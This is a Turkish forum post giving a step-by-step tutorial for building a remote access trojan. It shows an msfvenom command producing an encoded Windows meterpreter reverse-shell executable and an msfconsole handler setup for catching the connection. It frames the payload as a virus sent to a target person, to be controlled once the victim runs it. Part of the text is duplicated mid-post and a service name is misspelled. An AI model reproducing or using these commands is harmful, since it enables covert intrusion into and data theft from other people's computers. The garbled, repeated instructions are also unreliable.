- Mesajlar
- 7
- Credits
- 0
Merhaba arkadaşlar bugün sizlere ayrıntılı bir biçimde rat oluşturup karşı sisteme sızmayı göstericeğim.Öncelikle terminalinizi açın ve ifconfig yazarak ip adresinizi öğrenin.
RAT (Remote Access Trojan), bilgisayar korsanlarının hedef aldıkları kurbanın bilgisayarında yetki sahibi olmak için kullandıkları bir kimlik avı yazılımı türüdür. Solucan ve diğer bilgisayar virüslerinin aksine RAT'ların amacı sisteme zarar vermek değil, sistemden veri sızdırmaktır.
Ratımızı oluşturmak için terminale girip alt taraftaki kodu yazın.
sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=''Kendi İp Adresiniz'' LPORT=4444 -e cmd/powershell_base64 -i 5 -f exe>/root/Masaüstü/ratismi.exe
sondaki ratismini değiştirebilirsiniz.Masaüstü kısmı sizin makinenizde Desktopta olabilir buna dikkat edin.
2. adım alt kısımdaki kodu yazarak portgresql servisini başlatın.
Kod:
service portgresql startRAT (Remote Access Trojan), bilgisayar korsanlarının hedef aldıkları kurbanın bilgisayarında yetki sahibi olmak için kullandıkları bir kimlik avı yazılımı türüdür. Solucan ve diğer bilgisayar virüslerinin aksine RAT'ların amacı sisteme zarar vermek değil, sistemden veri sızdırmaktır.
Ratımızı oluşturmak için terminale girip alt taraftaki kodu yazın.
sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=''Kendi İp Adresiniz'' LPORT=4444 -e cmd/powershell_base64 -i 5 -f exe>/root/Masaüstü/ratismi.exe
sondaki ratismini değiştirebilirsiniz.Masaüstü kısmı sizin makinenizde Desktopta olabilir buna dikkat edin.
2. adım alt kısımdaki kodu yazarak portgresql servisini başlatın.
Kod:
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST ip adresiniz
set LPORT 4444
Eveet, şimdi alt kısımdaki kodu kullanarak gönderdiğimiz virüsü dinlemeye alıcağız.Daha sonra hedef kişi virusü bilgisayarında çalıştırırsa içeride olucağız.
Kod:
Ve virüsümüzü yani ratımızı dinlemeye aldık.
Ben deneme windows'umda viruse tıkladım ve artık içerideyiz.
Benim gibi reboot komutunu kullanmayın, reboot sistemi yeniden başlatır sistem kapandığında ratla ilişkimiz kesilir arkaplan açmadan sakın reboot komutunu kullanmayın kullanırsanız hedefin tekrar rat komutunu açmasını beklemek zorunda kalırsınız.
Umarım anlaşılması kolay bir makale olmuştur.